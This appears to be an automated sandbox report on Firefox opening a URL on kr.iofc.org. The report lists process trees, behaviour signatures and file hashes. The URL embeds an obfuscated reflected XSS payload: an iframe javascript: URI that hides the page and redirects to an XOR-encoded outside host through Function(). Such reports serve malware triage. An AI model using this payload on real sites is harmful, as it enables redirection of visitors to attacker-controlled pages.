Analysis

  • max time kernel
    15s
  • max time network
    18s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system
  • submitted
    22-05-2024 02:03

General

  • Target

    http://kr.iofc.org/error?msg=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3ElgJ%3DjRi%2Ck3gyg9%2BP%29FsMvf%3Dg%3C%29~%27m%3Cimg%20src%3D%22%3B%3ABpBKn%26%C3%97%2B%3DB%3DdPxNJTkN%3B%2B%2B%21He%2BR%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22e%C3%975%22%3E%2313pk.CjSw9%3DH.%3A%2Ar2ByE%2B__%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.j
o%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu

Score
1/10

Malware Config

Signatures

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://kr.iofc.org/error?msg=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3ElgJ%3DjRi%2Ck3gyg9%2BP%29FsMvf%3Dg%3C%29~%27m%3Cimg%20src%3D%22%3B%3ABpBKn%26%C3%97%2B%3DB%3DdPxNJTkN%3B%2B%2B%21He%2BR%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22e%C3%975%22%3E%2313pk.CjSw9%3DH.%3A%2Ar2ByE%2B__%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCh
arCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://kr.iofc.org/error?msg=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3ElgJ%3DjRi%2Ck3gyg9%2BP%29FsMvf%3Dg%3C%29~%27m%3Cimg%20src%3D%22%3B%3ABpBKn%26%C3%97%2B%3DB%3DdPxNJTkN%3B%2B%2B%21He%2BR%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22e%C3%975%22%3E%2313pk.CjSw9%3DH.%3A%2Ar2ByE%2B__%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromC
harCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.0.1656358199\1152192798" -parentBuildID 20230214051806 -prefsHandle 1736 -prefMapHandle 1728 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {14dbce44-cd2e-4b4b-b37e-521ad85eb9fc} 436 "\\.\pipe\gecko-crash-server-pipe.436" 1816 1d88d510858 gpu
        3⤵
          PID:3172
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.1.1237528136\1530507693" -parentBuildID 20230214051806 -prefsHandle 2384 -prefMapHandle 2372 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a1ac8c9-3c0b-42c7-a37a-c3095eced1a5} 436 "\\.\pipe\gecko-crash-server-pipe.436" 2412 1d88089b958 socket
          3⤵
            PID:2620
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.2.964630211\2099213594" -childID 1 -isForBrowser -prefsHandle 2976 -prefMapHandle 2868 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88df5c34-ca23-42ed-9939-9021d7b428ff} 436 "\\.\pipe\gecko-crash-server-pipe.436" 2988 1d890564258 tab
            3⤵
              PID:3520
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.3.1564078149\756154440" -childID 2 -isForBrowser -prefsHandle 3292 -prefMapHandle 3404 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd139996-c953-468a-9599-47e0f93be4df} 436 "\\.\pipe\gecko-crash-server-pipe.436" 3508 1d89200b458 tab
              3⤵
                PID:4256
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.4.1952938245\1596700469" -childID 3 -isForBrowser -prefsHandle 5060 -prefMapHandle 5056 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de834650-7061-4733-adf6-4bbc14d9e712} 436 "\\.\pipe\gecko-crash-server-pipe.436" 5068 1d893582858 tab
                3⤵
                  PID:1988
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.5.1975534028\376576177" -childID 4 -isForBrowser -prefsHandle 5212 -prefMapHandle 5216 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {405f2d08-18c1-4a55-bba2-6a920611ae2e} 436 "\\.\pipe\gecko-crash-server-pipe.436" 5200 1d8938e0b58 tab
                  3⤵
                    PID:1684
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.6.1686172806\1182788095" -childID 5 -isForBrowser -prefsHandle 5396 -prefMapHandle 5400 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6da664df-02fc-40a1-963d-c79cacd17a36} 436 "\\.\pipe\gecko-crash-server-pipe.436" 5480 1d8938e3558 tab
                    3⤵
                      PID:4832

                Network

                MITRE ATT&CK Enterprise v15

                Downloads

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\47kntzet.default-release\activity-stream.discovery_stream.json.tmp

                  Filesize

                  23KB

                  MD5

                  db0ad8c6113ceb58ae015772618268d7

                  SHA1

                  222fc55c75af76985157d1c4a6ddc0c570c3f1a0

                  SHA256

                  7749f08c950263f72558b368ca90a2965ed73d8ec7c2bd53f702b7f571e1a890

                  SHA512

                  d816f099d38a032f30ba9264f9a93c337a82bd90c44026ef114356f1c09f400906c7e267e659008469a05cb88b852c833f23fd8dfce540aaa955768ce4e899b6

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\47kntzet.default-release\prefs.js

                  Filesize

                  6KB

                  MD5

                  c81a47e12c5bc720b629fd2f4f794413

                  SHA1

                  f2cc26e24c1936e85b98c8b123a851809318be3f

                  SHA256

                  fbd9967742567f453adcd9117584b0fb98a9d1f3ee55e8adc7f25f40dff2c548

                  SHA512

                  ef30bd1b943d531682a38a7ef3dcbf7e630a08120f21342b84d2a91732f7c8ec095f569b98e33e5afb1ae0d16d2a61c85b3dd2ecd042252a4d7e37e2db1fcf36

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\47kntzet.default-release\prefs.js

                  Filesize

                  6KB

                  MD5

                  115a985f81e8e7d2e951ebf88a160574

                  SHA1

                  2db7312fef3d6bb40895357c904dc9e5814543ff

                  SHA256

                  73b30737f4e8ab40c366ace6d4149f9b97b17ac7ede570cfb7965dfc62b24ab7

                  SHA512

                  0587ee3a51911d2b95c91732fb7624496e5bdcc2ee3a090c21b8133a98c192b10e62f44a8e132535acc2117e62cc3a39d88178986b42999d89a4b25b54dc8cea